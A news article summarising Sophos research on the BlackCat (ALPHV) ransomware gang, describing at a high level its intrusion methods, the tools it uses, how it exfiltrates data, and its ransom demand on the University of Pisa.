Gangs Target Big Businesses in the U.S., Europe, and Asia

The Brute Ratel pentesting tool with remote access features has been added to the ransomware gang behind BlackCat’s updated arsenal.

Sophos’ threat researchers claim to have been following this ransomware organisation since December 2021, when they were contacted to look into at least five assaults that used this ransomware.

They noted that these assaults took place at significant firms involved in many industry sectors throughout the U.S., Europe, and Asia.

They discovered during their investigation that the attackers were downloading and running Cobalt Strike beacons on some vulnerable PCs using a PowerShell operation. Brute Ratel, a tool with “Cobalt Strike-like remote access features,” was used by the attackers, the researchers also found.

According to Christopher Budd, senior manager of threat research at Sophos, “what we’re witnessing with BlackCat and other attacks recently is that threat actors are incredibly efficient and effective in their job.” He explains how they still have success using tried-and-true techniques like exploiting weak firewalls and VPNs. However, they also develop new techniques to get beyond security measures, such as using the more recent post-exploitation C2 framework Brute Ratel in their attacks.

ALPHV is another name for the ransomware-as-a-service BlackCat organisation, which could be a rebrand of the DarkSide or BlackMatter ransomware groups. Rust, a programming language renowned for quick performance and structural defences against specific types of flaws, was used to create the malware. Security company Varonis’ analysis reveals that the organisation is aggressively seeking operators with the promise that affiliates can keep 90% of the victims’ compensation.

In June, the University of Pisa became a victim of the BlackCat ransomware. The university’s IT system was apparently taken over by the ransomware gang, who then demanded a $4.5 million payment.

The attackers claim that the ransom is a “discount price” that, if not paid immediately, will rise to $5 million. A screenshot of the purported ransom notes, which displays a clock counting down the seconds until the price increases, was also provided by an Italian news site (see: BlackCat Attacks University of Pisa, Demands $4.5M Ransom).

Investigation Details

Using BlackCat, ransomware groups can access large-scale enterprise networks. Researchers discovered that the ransomware groups use unpatched vulnerabilities in firewall/VPN devices that were first discovered in 2018. In at least two instances, they have pivotal to internal systems after gaining a foothold from the firewall.

According to Sophos researchers, in two of the attacks, “the attackers used a vulnerability that was reported last year to target the product of a different firewall provider.”

But in one instance, Sophos researchers discovered that the flaws allowed attackers to get VPN credentials from the firewall devices and use them to log in to the VPN as authorised users.

“For these VPNs, none of the targets employed multifactor authentication. The lone exception seems to have been a spear-phishing assault that gave the attackers access to an internal user’s VPN login credentials, “According to Andrew Brandt, head of research at SophosLabs. Once inside the network, the attackers mostly moved between computers via RDP, then used the VPN connection to launch brute-force attacks against the Administrator account on network workstations.

The ransomware software is intended to attack VMware ESXi hypervisor servers but has the ability to propagate laterally to Windows computers.

In another instance, Sophos incident responders produced a fresh set of credentials after removing a hacked VPN account from the firewall. The researchers saw that the attackers continued to try to encrypt PCs while using the same exploit a second time and succeeding in obtaining the freshly formed credential combination.

Using Remote Access Tools

Once inside a network, the attackers install a variety of remote access tools on a system that is connected to it. This offers them backup ways to connect remotely to their targets’ networks.

The attacker installed nGrok, an open-source remote access tool, in addition to using commercial remote access programmes like AnyDesk and TeamViewer, according to Sophos investigators.

Additionally, Brandt notes that the attackers utilised PowerShell commands to download and run Cobalt Strike beacons on some workstations as well as the more modern pentesting programme Brute Ratel, which has functionality similar to Cobalt Strike’s remote access capabilities.

Researchers from Sophos discovered that the Brute Ratel binary was set up on a compromised computer as a Windows service called wewe.

The fact that some of the targeted firms were using the same servers that had been infected using the Log4j vulnerability presented one of the major hurdles for the Sophos investigators.

Along with encrypting network systems, the threat actors also exfiltrated sensitive material from the targets, collected massive amounts of data, and transferred it to Mega, a cloud storage service.

According to the researchers, the attackers used a third-party programme called DirLister to compile a list of accessible directories and files, or in some cases, they used a PowerShell script from a pentester toolkit called PowerView.ps1 to enumerate the network’s computers. In other instances, they employed a programme called LaZagne to extract passwords saved on various devices.

Threat actors utilised WinRAR to compress the files into.rar archives after gathering them, and rsync to upload the stolen material.

According to Sophos analysts, they discovered proof that the attackers broke into the network months before they started looking into this case. Additionally, the attackers had “cryptominer software on 16 servers inside the corporate network in early November,” according to what they could see.

Reference :